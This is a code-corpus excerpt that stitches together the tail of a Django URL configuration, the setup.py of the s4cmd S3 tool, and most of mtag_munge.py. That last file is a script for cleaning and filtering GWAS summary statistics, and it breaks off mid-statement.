name='argument-create'),
url(r'^argument/(?P<pk>[\w\d]+)/$',
ArgumentDetailView.as_view(),
name='argument-detail'),
url(r'^argument/(?P<pk>[\w\d]+)/edit/$',
ArgumentUpdateView.as_view(),
name='argument-update'),
url(r'^argument/(?P<pk>[\w\d]+)/delete/$',
ArgumentDeleteView.as_view(),
name='argument-delete'),
# Task URLS
url(r'^tasks$',
TaskListView.as_view(),
name='task-list'),
url(r'^task/(?P<id>\d+)/run/$',
runTask, name='runTask'),
# url(r'^task/(?P<pk>[\w\d]+)/run/$',
# runTask, name='runTask'),
url(r'^task/add/$',
TaskCreateView.as_view(),
name='task-create'),
url(r'^task/(?P<pk>[\w\d]+)/$',
TaskDetailView.as_view(),
name='task-detail'),
url(r'^task/(?P<pk>[\w\d]+)/edit/$',
TaskUpdateView.as_view(),
name='task-update'),
url(r'^task/(?P<pk>[\w\d]+)/delete/$',
TaskDeleteView.as_view(),
name='task-delete'),
)
| mit | -5,152,567,834,804,699,000 | 53.887755 | 467 | 0.3971 | false |
alinikkhah/s4cmd | setup.py | 1 | 1218 | #!/usr/bin/env python
#
# Copyright 2012 BloomReach, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Super S3 command line tool, setup.py
"""
from setuptools import setup, find_packages
__author__ = "Chou-han Yang"
__copyright__ = "Copyright 2014 BloomReach, Inc."
__license__ = "http://www.apache.org/licenses/LICENSE-2.0"
__version__ = "1.5.19"
__maintainer__ = __author__
__status__ = "Development"
setup(name='s4cmd',
version=__version__,
description='Super S3 command line tool',
author=__author__,
license=__license__,
url='https://github.com/bloomreach/s4cmd',
packages=find_packages(),
scripts=['s4cmd.py'],
install_requires=['boto>=2.3.0'],
)
| apache-2.0 | 6,579,009,193,789,784,000 | 28.707317 | 74 | 0.684729 | false |
omeed-maghzian/mtag | mtag_munge.py | 1 | 36789 | #!/usr/bin/env python
from __future__ import division
from __future__ import absolute_import
from ldsc_mod.ldscore import allele_info as allele_info
import pandas as pd
import numpy as np
import os
import sys
import traceback
import gzip
import bz2
import argparse
from scipy.stats import chi2
import logging
import time
np.seterr(invalid='ignore')
try:
x = pd.DataFrame({'A': [1, 2, 3]})
x.sort_values(by='A')
except AttributeError:
raise ImportError('LDSC requires pandas version >= 0.17.0')
null_values = {
'LOG_ODDS': 0,
'OR': 1,
'Z': 0,
'BETA': 0
}
## default column names
def set_default_cnames(args):
return {
# snpid
'SNPID': 'SNP',
'SNP': 'SNP',
'snp': 'SNP',
'MARKERNAME': 'SNP',
'markername': 'SNP',
'RS': 'SNP',
'RSID': 'SNP',
'RS_NUMBER': 'SNP',
'RS_NUMBERS': 'SNP',
'rsID': 'SNP',
'snpid':'SNP',
# n
'N': 'N',
'n': 'N',
'sample_size': 'N',
'ncol': 'N',
# freq
'FREQ': 'FRQ',
'A1FREQ': 'FRQ',
'a1freq': 'FRQ',
'EAF': 'FRQ',
'eaf': 'FRQ',
'FRQ': 'FRQ',
'frq': 'FRQ',
'AF': 'FRQ',
'FRQ': 'FRQ',
'MAF': 'FRQ',
'FRQ_U': 'FRQ',
'F_U': 'FRQ',
'freq': 'FRQ',
# chr
'CHR': 'CHR',
'Chromosome': 'CHR',
'chromosome': 'CHR',
'Chr': 'CHR',
'chr': 'CHR',
# bpos
'BPOS': 'BP',
'Bpos': 'BP',
'BP': 'BP',
'bp': 'BP',
'POS': 'BP',
'Pos': 'BP',
'pos': 'BP',
'position': 'BP',
'Position': 'BP',
'bpos': 'BP',
# a1
'A1': 'A1',
'ALLELE1': 'A1',
'allele1': 'A1',
'EFFECT_ALLELE': 'A1',
'effect_allele': 'A1',
'EA': 'A1',
'ea': 'A1',
'a1': 'A1',
# a2
'A2': 'A2',
'ALLELE0': 'A2',
'allele0': 'A2',
'ALLELE2': 'A2',
'allele2': 'A2',
'OTHER_ALLELE': 'A2',
'other_allele': 'A2',
'OA': 'A2',
'oa': 'A2',
'a2': 'A2',
# beta
'BETA': 'BETA',
'Beta': 'BETA',
'EFFECT': 'BETA',
'Effect': 'BETA',
'effect': 'BETA',
'b': 'BETA',
'beta': 'BETA',
# se
'SE': 'SE',
'SE_unadj': 'SE',
'se_unadj': 'SE',
'SE_UNADJ': 'SE',
'se': 'SE',
's': 'SE',
# z
'Z': 'Z',
'Z_unadj': 'Z',
'z_unadj': 'Z',
'Z_UNADJ': 'Z',
'z': 'Z',
'Z-score':'Z',
'z-score':'Z',
'ZSCORE':'Z',
# pval
'PVAL': 'P',
'Pval': 'P',
'P_BOLT_LMM_INF': 'P',
'P_BOLT_LMM': 'P',
'P': 'P',
'p': 'P',
'P_unadj': 'P',
'p_unadj': 'P',
'P_UNADJ': 'P',
'pval': 'P',
# info
'INFO': 'INFO',
'info': 'INFO',
'RSQ': 'INFO',
'rsq': 'INFO'
}
default_cnames = {
# RS NUMBER
'SNP': 'SNP',
'MARKERNAME': 'SNP',
'SNPID': 'SNP',
'RS': 'SNP',
'RSID': 'SNP',
'RS_NUMBER': 'SNP',
'RS_NUMBERS': 'SNP',
# NUMBER OF STUDIES
'NSTUDY': 'NSTUDY',
'N_STUDY': 'NSTUDY',
'NSTUDIES': 'NSTUDY',
'N_STUDIES': 'NSTUDY',
# P-VALUE
'P': 'P',
'PVALUE': 'P',
'P_VALUE': 'P',
'PVAL': 'P',
'P_VAL': 'P',
'GC_PVALUE': 'P',
# ALLELE 1
'A1': 'A1',
'ALLELE1': 'A1',
'ALLELE_1': 'A1',
'EFFECT_ALLELE': 'A1',
'REFERENCE_ALLELE': 'A1',
'INC_ALLELE': 'A1',
'EA': 'A1',
# ALLELE 2
'A2': 'A2',
'ALLELE2': 'A2',
'ALLELE_2': 'A2',
'OTHER_ALLELE': 'A2',
'NON_EFFECT_ALLELE': 'A2',
'DEC_ALLELE': 'A2',
'NEA': 'A2',
# N
'N': 'N',
'NCASE': 'N_CAS',
'CASES_N': 'N_CAS',
'N_CASE': 'N_CAS',
'N_CASES': 'N_CAS',
'N_CONTROLS': 'N_CON',
'N_CAS': 'N_CAS',
'N_CON': 'N_CON',
'N_CASE': 'N_CAS',
'NCONTROL': 'N_CON',
'CONTROLS_N': 'N_CON',
'N_CONTROL': 'N_CON',
'WEIGHT': 'N', # metal does this. possibly risky.
# SIGNED STATISTICS
'ZSCORE': 'Z',
'Z-SCORE': 'Z',
'GC_ZSCORE': 'Z',
'Z': 'Z',
'Z_unadj': 'Z',
'z_unadj': 'Z',
'Z_UNADJ': 'Z',
'z': 'Z',
'Z-score':'Z',
'z-score':'Z',
'OR': 'OR',
'B': 'BETA',
'BETA': 'BETA',
'SE':'SE',
'LOG_ODDS': 'LOG_ODDS',
'EFFECTS': 'BETA',
'EFFECT': 'BETA',
'SIGNED_SUMSTAT': 'SIGNED_SUMSTAT',
# info
'INFO': 'INFO',
'info': 'INFO',
'RSQ': 'INFO',
'rsq': 'INFO',
# MAF
'AF': 'FRQ',
'EAF': 'FRQ',
'FRQ': 'FRQ',
'MAF': 'FRQ',
'FRQ_U': 'FRQ',
'F_U': 'FRQ',
}
describe_cname = {
'SNP': 'Variant ID (e.g., rs number)',
'P': 'p-Value',
'A1': 'a1, interpreted as ref allele for signed sumstat.',
'A2': 'a2, interpreted as non-ref allele for signed sumstat.',
'N': 'Sample size',
'N_CAS': 'Number of cases',
'N_CON': 'Number of controls',
'Z': 'Z-score (0 --> no effect; above 0 --> A1 is trait/risk increasing)',
'OR': 'Odds ratio (1 --> no effect; above 1 --> A1 is risk increasing)',
'BETA': '[linear/logistic] regression coefficient (0 --> no effect; above 0 --> A1 is trait/risk increasing)',
'SE': 'Standard errors of BETA coefficients',
'LOG_ODDS': 'Log odds ratio (0 --> no effect; above 0 --> A1 is risk increasing)',
'INFO': 'INFO score (imputation quality; higher --> better imputation)',
'FRQ': 'Allele frequency',
'SIGNED_SUMSTAT': 'Directional summary statistic as specified by --signed-sumstats.',
'NSTUDY': 'Number of studies in which the SNP was genotyped.'
}
def read_header(fh):
'''Read the first line of a file and returns a list with the column names.'''
(openfunc, compression) = get_compression(fh)
return [x.rstrip('\n') for x in openfunc(fh).readline().split()]
def get_cname_map(flag, default, ignore):
'''
Figure out which column names to use.
Priority is
(1) ignore everything in ignore
(2) use everything in flags that is not in ignore
(3) use everything in default that is not in ignore or in flags
The keys of flag are cleaned. The entries of ignore are not cleaned. The keys of defualt
are cleaned. But all equality is modulo clean_header().
'''
clean_ignore = [clean_header(x) for x in ignore]
cname_map = {x: flag[x] for x in flag if x not in clean_ignore}
cname_map.update(
{x: default[x] for x in default if x not in clean_ignore + list(flag.keys())})
return cname_map
def get_compression(fh):
'''
Read filename suffixes and figure out whether it is gzipped,bzip2'ed or not compressed
'''
if fh.endswith('gz'):
compression = 'gzip'
openfunc = gzip.open
elif fh.endswith('bz2'):
compression = 'bz2'
openfunc = bz2.BZ2File
else:
openfunc = open
compression = None
return openfunc, compression
def clean_header(header):
'''
For cleaning file headers.
- convert to uppercase
- replace dashes '-' with underscores '_'
- replace dots '.' (as in R) with underscores '_'
- remove newlines ('\n')
'''
return header.upper().replace('-', '_').replace('.', '_').replace('\n', '')
def filter_pvals(P, args):
'''Remove out-of-bounds P-values'''
ii = (P > 0) & (P <= 1)
bad_p = (~ii).sum()
if bad_p > 0:
msg = 'WARNING: {N} SNPs had P outside of (0,1]. The P column may be mislabeled.'
logging.info(msg.format(N=bad_p))
return ii
def filter_info(info, args):
'''Remove INFO < args.info_min (default 0.9) and complain about out-of-bounds INFO.'''
if type(info) is pd.Series: # one INFO column
jj = ((info > 2.0) | (info < 0)) & info.notnull()
ii = info >= args.info_min
elif type(info) is pd.DataFrame: # several INFO columns
jj = (((info > 2.0) & info.notnull()).any(axis=1) | (
(info < 0) & info.notnull()).any(axis=1))
ii = (info.sum(axis=1) >= args.info_min * (len(info.columns)))
else:
raise ValueError('Expected pd.DataFrame or pd.Series.')
bad_info = jj.sum()
if bad_info > 0:
msg = 'WARNING: {N} SNPs had INFO outside of [0,1.5]. The INFO column may be mislabeled.'
logging.info(msg.format(N=bad_info))
return ii
def filter_frq(frq, args):
'''
Filter on MAF. Remove MAF < args.maf_min and out-of-bounds MAF.
'''
jj = (frq < 0) | (frq > 1)
bad_frq = jj.sum()
if bad_frq > 0:
msg = 'WARNING: {N} SNPs had FRQ outside of [0,1]. The FRQ column may be mislabeled.'
logging.info(msg.format(N=bad_frq))
frq = np.minimum(frq, 1 - frq)
ii = frq > args.maf_min
return ii & ~jj
def filter_se(se, args):
'''
Filter on SE. Remove SE < 0.
'''
ii = (se >= 0)
bad_se = (~ii).sum()
if bad_se > 0:
msg = 'WARNING: {N} SNPs had SE that are negative.'
logging.info(msg.format(N=bad_se))
return ii
def filter_alleles(a, keep_str_ambig):
'''Remove alleles that do not describe strand-unambiguous SNPs'''
VALID_SNPS_list = allele_info.VALID_andSA_SNPS if keep_str_ambig else allele_info.VALID_SNPS
return a.isin(VALID_SNPS_list)
def parse_dat(dat_gen, convert_colname, merge_alleles, args):
'''Parse and filter a sumstats file chunk-wise'''
tot_snps = 0
dat_list = []
msg = 'Reading sumstats from {F} into memory {N} SNPs at a time.'
logging.info(msg.format(F=args.sumstats if args.sumstats is not None else 'provided DataFrame', N=int(args.chunksize)))
drops = {'NA': 0, 'P': 0, 'INFO': 0,
'FRQ': 0, 'A': 0, 'SNP': 0, 'MERGE': 0, 'SE': 0}
for block_num, dat in enumerate(dat_gen):
tot_snps += len(dat)
old = len(dat)
dat = dat.dropna(axis=0, how="any", subset=set(dat.columns)-set(['INFO'])).reset_index(drop=True)
#dat = dat.dropna(axis=0, how="any", subset=filter(
# lambda x: x != 'INFO', dat.columns)).reset_index(drop=True)
drops['NA'] += old - len(dat)
dat.columns = map(lambda x: convert_colname[x], dat.columns)
ii = np.array([True for i in range(len(dat))])
if args.merge_alleles:
old = ii.sum()
ii = dat.SNP.isin(merge_alleles.SNP)
drops['MERGE'] += old - ii.sum()
if ii.sum() == 0:
continue
dat = dat[ii].reset_index(drop=True)
ii = np.array([True for i in range(len(dat))])
if 'INFO' in dat.columns:
old = ii.sum()
ii &= filter_info(dat['INFO'], args)
new = ii.sum()
drops['INFO'] += old - new
old = new
if 'FRQ' in dat.columns:
old = ii.sum()
ii &= filter_frq(dat['FRQ'], args)
new = ii.sum()
drops['FRQ'] += old - new
old = new
if 'SE' in dat.columns:
old = ii.sum()
ii &= filter_se(dat['SE'], args)
new = ii.sum()
drops['SE'] += old - new
old = new
old = ii.sum()
if args.keep_maf:
dat.drop(
[x for x in ['INFO'] if x in dat.columns], inplace=True, axis=1)
else:
dat.drop(
[x for x in ['INFO', 'FRQ'] if x in dat.columns], inplace=True, axis=1)
ii &= filter_pvals(dat.P, args)
new = ii.sum()
drops['P'] += old - new
old = new
if not args.no_alleles:
dat.A1 = dat.A1.str.upper()
dat.A2 = dat.A2.str.upper()
ii &= filter_alleles(dat.A1 + dat.A2, args.keep_str_ambig)
new = ii.sum()
drops['A'] += old - new
old = new
if ii.sum() == 0:
continue
dat_list.append(dat[ii].reset_index(drop=True))
dat = pd.concat(dat_list, axis=0).reset_index(drop=True)
msg = 'Read {N} SNPs from --sumstats file.\n'.format(N=tot_snps)
if args.merge_alleles:
msg += 'Removed {N} SNPs not in --merge-alleles.\n'.format(
N=drops['MERGE'])
msg += 'Removed {N} SNPs with missing values.\n'.format(N=drops['NA'])
msg += 'Removed {N} SNPs with INFO <= {I}.\n'.format(
N=drops['INFO'], I=args.info_min)
msg += 'Removed {N} SNPs with MAF <= {M}.\n'.format(
N=drops['FRQ'], M=args.maf_min)
msg += 'Removed {N} SNPs with SE <0 or NaN values.\n'.format(N=drops['SE'])
msg += 'Removed {N} SNPs with out-of-bounds p-values.\n'.format(
N=drops['P'])
msg += 'Removed {N} variants that were not SNPs or were strand-ambiguous.\n'.format(
N=drops['A']) if not args.keep_str_ambig else 'Removed {N} variants that were not SNPs. Note: strand ambiguous SNPs were not dropped.\n'.format(
N=drops['A'])
msg += '{N} SNPs remain.'.format(N=len(dat))
logging.info(msg)
return dat
def process_n(dat, args):
'''Determine sample size from --N* flags or N* columns. Filter out low N SNPs.s'''
if all(i in dat.columns for i in ['N_CAS', 'N_CON']):
N = dat.N_CAS + dat.N_CON
P = dat.N_CAS / N
dat['N'] = N * P / P[N == N.max()].mean()
dat.drop(['N_CAS', 'N_CON'], inplace=True, axis=1)
# NB no filtering on N done here -- that is done in the next code block
if 'N' in dat.columns:
n_min = args.n_min if args.n_min or args.n_min==0 else dat.N.quantile(0.9) / 1.5
old = len(dat)
dat = dat[dat.N >= n_min].reset_index(drop=True)
new = len(dat)
logging.info('Removed {M} SNPs with N < {MIN} ({N} SNPs remain).'.format(
M=old - new, N=new, MIN=n_min))
elif 'NSTUDY' in dat.columns and 'N' not in dat.columns:
nstudy_min = args.nstudy_min if args.nstudy_min else dat.NSTUDY.max()
old = len(dat)
dat = dat[dat.NSTUDY >= nstudy_min].drop(
['NSTUDY'], axis=1).reset_index(drop=True)
new = len(dat)
logging.info('Removed {M} SNPs with NSTUDY < {MIN} ({N} SNPs remain).'.format(
M=old - new, N=new, MIN=nstudy_min))
if 'N' not in dat.columns:
if args.N:
dat['N'] = args.N
logging.info('Using N = {N}'.format(N=args.N))
elif args.N_cas and args.N_con:
dat['N'] = args.N_cas + args.N_con
if args.daner is None:
msg = 'Using N_cas = {N1}; N_con = {N2}'
logging.info(msg.format(N1=args.N_cas, N2=args.N_con))
else:
raise ValueError('Cannot determine N. This message indicates a bug.\n'
'N should have been checked earlier in the program.')
return dat
def p_to_z(P, N):
'''Convert P-value and N to standardized beta.'''
return np.sqrt(chi2.isf(P, 1))
def check_median(x, expected_median, tolerance, name):
'''Check that median(x) is within tolerance of expected_median.'''
m = np.median(x)
if np.abs(m - expected_median) > tolerance:
msg = 'WARNING: median value of {F} is {V} (should be close to {M}). This column may be mislabeled.'
raise ValueError(msg.format(F=name, M=expected_median, V=round(m, 2)))
else:
msg = 'Median value of {F} was {C}, which seems sensible.'.format(
C=m, F=name)
return msg
def parse_flag_cnames(args):
'''
Parse flags that specify how to interpret nonstandard column names.
flag_cnames is a dict that maps (cleaned) arguments to internal column names
'''
cname_options = [
[args.nstudy, 'NSTUDY', '--nstudy'],
[args.snp, 'SNP', '--snp'],
[args.N_col, 'N', '--N'],
[args.N_cas_col, 'N_CAS', '--N-cas-col'],
[args.N_con_col, 'N_CON', '--N-con-col'],
[args.a1, 'A1', '--a1'],
[args.a2, 'A2', '--a2'],
[args.p, 'P', '--P'],
[args.frq, 'FRQ', '--nstudy'],
[args.info, 'INFO', '--info']
]
flag_cnames = {clean_header(x[0]): x[1]
for x in cname_options if x[0] is not None}
if args.info_list:
try:
flag_cnames.update(
{clean_header(x): 'INFO' for x in args.info_list.split(',')})
except ValueError:
logging.info(
'The argument to --info-list should be a comma-separated list of column names.')
raise
null_value = None
if args.signed_sumstats:
try:
cname, null_value = args.signed_sumstats.split(',')
null_value = float(null_value)
flag_cnames[clean_header(cname)] = 'SIGNED_SUMSTAT'
except ValueError:
logging.info(
'The argument to --signed-sumstats should be column header comma number.')
raise
return [flag_cnames, null_value]
def allele_merge(dat, alleles):
'''
WARNING: dat now contains a bunch of NA's~
Note: dat now has the same SNPs in the same order as --merge alleles.
'''
dat = pd.merge(
alleles, dat, how='left', on='SNP', sort=False).reset_index(drop=True)
ii = dat.A1.notnull()
a1234 = dat.A1[ii] + dat.A2[ii] + dat.MA[ii]
match = a1234.apply(lambda y: y in allele_info.MATCH_ALLELES)
jj = pd.Series(np.zeros(len(dat), dtype=bool))
jj[ii] = match
old = ii.sum()
n_mismatch = (~match).sum()
if n_mismatch < old:
logging.info('Removed {M} SNPs whose alleles did not match --merge-alleles ({N} SNPs remain).'.format(M=n_mismatch,N=old - n_mismatch))
else:
raise ValueError(
'All SNPs have alleles that do not match --merge-alleles.')
dat.loc[~jj, [i for i in dat.columns if i != 'SNP']] = float('nan')
dat.drop(['MA'], axis=1, inplace=True)
return dat
parser = argparse.ArgumentParser()
## input files and formatting
ifile = parser.add_argument_group(title='Input Files and Options', description="Input files and options to be used in munging. The --sumstats option is required.")
ifile.add_argument('--sumstats', default=None, type=str, help="Input filename.")
ifile.add_argument('--no-alleles', default=False, action="store_true",
help="Don't require alleles. Useful if only unsigned summary statistics are available "
"and the goal is h2 / partitioned h2 estimation rather than rg estimation.")
ifile.add_argument('--N', default=None, type=float,
help="Sample size If this option is not set, will try to infer the sample "
"size from the input file. If the input file contains a sample size "
"column, and this flag is set, the argument to this flag has priority.")
ifile.add_argument('--N-cas', default=None, type=float,
help="Number of cases. If this option is not set, will try to infer the number "
"of cases from the input file. If the input file contains a number of cases "
"column, and this flag is set, the argument to this flag has priority.")
ifile.add_argument('--N-con', default=None, type=float,
help="Number of controls. If this option is not set, will try to infer the number "
"of controls from the input file. If the input file contains a number of controls "
"column, and this flag is set, the argument to this flag has priority.")
ifile.add_argument('--input-datgen', default=None, action='store',
help='When calling munge_sumstats directly through Python, you can pass the generator of df chunks directly rather than reading from data.')
ifile.add_argument('--cnames', default=None, action='store',
help='list of column names that must be passed alongside the input datgen.' )
## input filtering
iformat = parser.add_argument_group(title='Input Formatting', description='Column names and some input specifications for summary statistics.')
iformat.add_argument('--snp', default=None, type=str,
help='Name of SNP column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--N-col', default=None, type=str,
help='Name of N column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--N-cas-col', default=None, type=str,
help='Name of N column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--N-con-col', default=None, type=str,
help='Name of N column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--a1', default=None, type=str,
help='Name of A1 column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--a2', default=None, type=str,
help='Name of A2 column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--p', default=None, type=str,
help='Name of p-value column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--frq', default=None, type=str,
help='Name of FRQ or MAF column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--signed-sumstats', default=None, type=str,
help='Name of signed sumstat column, comma null value (e.g., Z,0 or OR,1). NB: case insensitive.')
iformat.add_argument('--info', default=None, type=str,
help='Name of INFO column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--info-list', default=None, type=str,
help='Comma-separated list of INFO columns. Will filter on the mean. NB: case insensitive.')
iformat.add_argument('--nstudy', default=None, type=str,
help='Name of NSTUDY column (if not a name that ldsc understands). NB: case insensitive.')
iformat.add_argument('--nstudy-min', default=None, type=float,
help='Minimum # of studies. Default is to remove everything below the max, unless there is an N column,'
' in which case do nothing.')
iformat.add_argument('--ignore', default=None, type=str,
help='Comma-separated list of column names to ignore.')
iformat.add_argument('--a1-inc', default=False, action='store_true',
help='A1 is the increasing allele.')
iformat.add_argument('--n-value', default=None, type=int,
help='Integer valued sample size to apply uniformly across SNPs.')
## filters
filters = parser.add_argument_group(title="Data Filters", description="Options to apply data filters to summary statistics.")
filters.add_argument('--maf-min', default=0.01, type=float, help="Minimum MAF.")
filters.add_argument('--info-min', default=0.9, type=float, help="Minimum INFO score.")
filters.add_argument('--daner', default=False, action='store_true',
help="Use this flag to parse Stephan Ripke's daner* file format.")
filters.add_argument('--daner-n', default=False, action='store_true',
help="Use this flag to parse more recent daner* formatted files, which "
"include sample size column 'Nca' and 'Nco'.")
filters.add_argument('--merge-alleles', default=None, type=str,
help="Same as --merge, except the file should have three columns: SNP, A1, A2, "
"and all alleles will be matched to the --merge-alleles file alleles.")
filters.add_argument('--n-min', default=None, type=float,
help='Minimum N (sample size). Default is (90th percentile N) / 1.5')
filters.add_argument('--chunksize', default=5e6, type=int,
help='Chunksize.')
parser.add_argument('--keep-str-ambig', default=False, action='store_true',
help=argparse.SUPPRESS) # This options allows munge sumstats to retain strand ambiguous SNPS instead of dropping them.
## output files
ofile = parser.add_argument_group(title="Output Options", description="Output directory and options.")
ofile.add_argument('--out', default=None, type=str, help="Output filename prefix.")
ofile.add_argument('--keep-maf', default=False, action='store_true',
help='Keep the MAF column (if one exists).')
ofile.add_argument('--keep-beta', default=False, action='store_true',
help='Keep the BETA column (if one exists).')
ofile.add_argument('--keep-se', default=False, action='store_true',
help='Keep the SE column (if one exists).')
ofile.add_argument('--stdout-off', default=False, action='store_true',
help='Only prints to the log file (not to console).')
def munge_sumstats(args, write_out=True, new_log=True):
if args.out is None and (write_out or new_log):
raise ValueError('The --out flag is required.')
START_TIME = time.time()
if new_log:
logging.basicConfig(format='%(asctime)s %(message)s', filename=args.out + '.log', filemode='w', level=logging.INFO,datefmt='%Y/%m/%d %I:%M:%S %p')
if not args.stdout_off:
logging.getLogger().addHandler(logging.StreamHandler()) # prints to console
try:
if args.sumstats is None and args.input_datgen is None:
raise ValueError('The --sumstats flag is required.')
if args.no_alleles and args.merge_alleles:
raise ValueError(
'--no-alleles and --merge-alleles are not compatible.')
if args.daner and args.daner_n:
raise ValueError('--daner and --daner-n are not compatible. Use --daner for sample ' +
'size from FRQ_A/FRQ_U headers, use --daner-n for values from Nca/Nco columns')
if write_out:
defaults = vars(parser.parse_args(''))
opts = vars(args)
non_defaults = [x for x in opts.keys() if opts[x] != defaults[x]]
header = allele_info.MASTHEAD
header += "Call: \n"
header += './munge_sumstats.py \\\n'
options = ['--'+x.replace('_','-')+' '+str(opts[x])+' \\' for x in non_defaults]
header += '\n'.join(options).replace('True','').replace('False','')
header = header[0:-1]+'\n'
logging.info(header)
file_cnames = read_header(args.sumstats) if args.input_datgen is None else args.cnames # note keys not cleaned
flag_cnames, signed_sumstat_null = parse_flag_cnames(args)
if args.ignore:
ignore_cnames = [clean_header(x) for x in args.ignore.split(',')]
else:
ignore_cnames = []
# remove LOG_ODDS, BETA, Z, OR from the default list
if args.signed_sumstats is not None or args.a1_inc:
mod_default_cnames = {x: default_cnames[
x] for x in default_cnames if default_cnames[x] not in null_values}
else:
mod_default_cnames = default_cnames
cname_map = get_cname_map(
flag_cnames, mod_default_cnames, ignore_cnames)
if args.daner:
frq_u = filter(lambda x: x.startswith('FRQ_U_'), file_cnames)[0]
frq_a = filter(lambda x: x.startswith('FRQ_A_'), file_cnames)[0]
N_cas = float(frq_a[6:])
N_con = float(frq_u[6:])
logging.info(
'Inferred that N_cas = {N1}, N_con = {N2} from the FRQ_[A/U] columns.'.format(N1=N_cas, N2=N_con))
args.N_cas = N_cas
args.N_con = N_con
# drop any N, N_cas, N_con or FRQ columns
for c in ['N', 'N_CAS', 'N_CON', 'FRQ']:
for d in [x for x in cname_map if cname_map[x] == 'c']:
del cname_map[d]
cname_map[frq_u] = 'FRQ'
if args.daner_n:
frq_u = filter(lambda x: x.startswith('FRQ_U_'), file_cnames)[0]
cname_map[frq_u] = 'FRQ'
try:
dan_cas = clean_header(file_cnames[file_cnames.index('Nca')])
except ValueError:
raise ValueError('Could not find Nca column expected for daner-n format')
try:
dan_con = clean_header(file_cnames[file_cnames.index('Nco')])
except ValueError:
raise ValueError('Could not find Nco column expected for daner-n format')
cname_map[dan_cas] = 'N_CAS'
cname_map[dan_con] = 'N_CON'
cname_translation = {x: cname_map[clean_header(x)] for x in file_cnames if
clean_header(x) in cname_map} # note keys not cleaned
cname_description = {
x: describe_cname[cname_translation[x]] for x in cname_translation}
if args.signed_sumstats is None and not args.a1_inc:
sign_cnames = [
x for x in cname_translation if cname_translation[x] in null_values]
if len(sign_cnames) > 1:
raise ValueError(
'Too many signed sumstat columns. Specify which to ignore with the --ignore flag.')
if len(sign_cnames) == 0:
raise ValueError(
'Could not find a signed summary statistic column.')
sign_cname = sign_cnames[0]
signed_sumstat_null = null_values[cname_translation[sign_cname]]
cname_translation[sign_cname] = 'SIGNED_SUMSTAT'
else:
sign_cname = 'SIGNED_SUMSTAT'
# check that we have all the columns we need
if not args.a1_inc:
req_cols = ['SNP', 'P', 'SIGNED_SUMSTAT']
else:
req_cols = ['SNP', 'P']
for c in req_cols:
if c not in cname_translation.values():
raise ValueError('Could not find {C} column.'.format(C=c))
# check aren't any duplicated column names in mapping
for field in cname_translation:
numk = list(file_cnames).count(field)
if numk > 1:
raise ValueError('Found {num} columns named {C}'.format(C=field,num=str(numk)))
# check multiple different column names don't map to same data field
for head in cname_translation.values():
numc = list(cname_translation.values()).count(head)
if numc > 1:
raise ValueError('Found {num} different {C} columns'.format(C=head,num=str(numc)))
if (not args.n_value) and (not args.N) and (not (args.N_cas and args.N_con)) and ('N' not in cname_translation.values()) and\
(any(x not in cname_translation.values() for x in ['N_CAS', 'N_CON'])):
raise ValueError('Could not determine N.')
if ('N' in cname_translation.values() or all(x in cname_translation.values() for x in ['N_CAS', 'N_CON']))\
and 'NSTUDY' in cname_translation.values():
nstudy = [
x for x in cname_translation if cname_translation[x] == 'NSTUDY']
for x in nstudy:
del cname_translation[x]
if not args.no_alleles and not all(x in cname_translation.values() for x in ['A1', 'A2']):
raise ValueError('Could not find A1/A2 columns.')
logging.info('Interpreting column names as follows:')
logging.info('\n'.join([x + ':\t' + cname_description[x]
for x in cname_description]) + '\n')
if args.merge_alleles:
logging.info(
'Reading list of SNPs for allele merge from {F}'.format(F=args.merge_alleles))
(openfunc, compression) = get_compression(args.merge_alleles)
merge_alleles = pd.read_csv(args.merge_alleles, compression=compression, header=0,
delim_whitespace=True, na_values='.')
if any(x not in merge_alleles.columns for x in ["SNP", "A1", "A2"]):
raise ValueError(
'--merge-alleles must have columns SNP, A1, A2.')
logging.info(
'Read {N} SNPs for allele merge.'.format(N=len(merge_alleles)))
merge_alleles['MA'] = (
merge_alleles.A1 + merge_alleles.A2).apply(lambda y: y.upper())
merge_alleles.drop(
[x for x in merge_alleles.columns if x not in ['SNP', 'MA']], axis=1, inplace=True)
else:
merge_alleles = None
# figure out which columns are going to involve sign information, so we can ensure
# they're read as floats
signed_sumstat_cols = [k for k,v in cname_translation.items() if v=='SIGNED_SUMSTAT']
if args.input_datgen is not None:
dat_gen = [sub_df[list(cname_translation.keys())] for sub_df in args.input_datgen]
else:
(openfunc, compression) = get_compression(args.sumstats)
dat_gen = pd.read_csv(args.sumstats, delim_whitespace=True, header=0,
compression=compression, usecols=cname_translation.keys(),
na_values=['.', 'NA','NaN'], iterator=True, chunksize=args.chunksize,
dtype={c:np.float64 for c in signed_sumstat_cols})
dat_gen = list(dat_gen)
dat = parse_dat(dat_gen, cname_translation, merge_alleles, args)
if len(dat) == 0:
raise ValueError('After applying filters, no SNPs remain.')
if args.n_value is not None:
logging.info('Adding uniform sample size {} to summary statistics.'.format(int(args.n_value)))
dat['N'] = int(args.n_value)
old = len(dat)
dat = dat.drop_duplicates(subset='SNP').reset_index(drop=True)
new = len(dat)
logging.info('Removed {M} SNPs with duplicated rs numbers ({N} SNPs remain).'.format(
M=old - new, N=new))
# filtering on N cannot be done chunkwise
dat = process_n(dat, args)
dat.P = p_to_z(dat.P, dat.N)
dat.rename(columns={'P': 'Z'}, inplace=True)
if not args.a1_inc:
logging.info(
check_median(dat.SIGNED_SUMSTAT, signed_sumstat_null, 0.1, sign_cname))
dat.Z *= (-1) ** (dat.SIGNED_SUMSTAT < signed_sumstat_null)
#dat.drop('SIGNED_SUMSTAT', inplace=True, axis=1)
# do this last so we don't have to worry about NA values in the rest of
# the program
if args.merge_alleles:
dat = allele_merge(dat, merge_alleles)
print_colnames = [
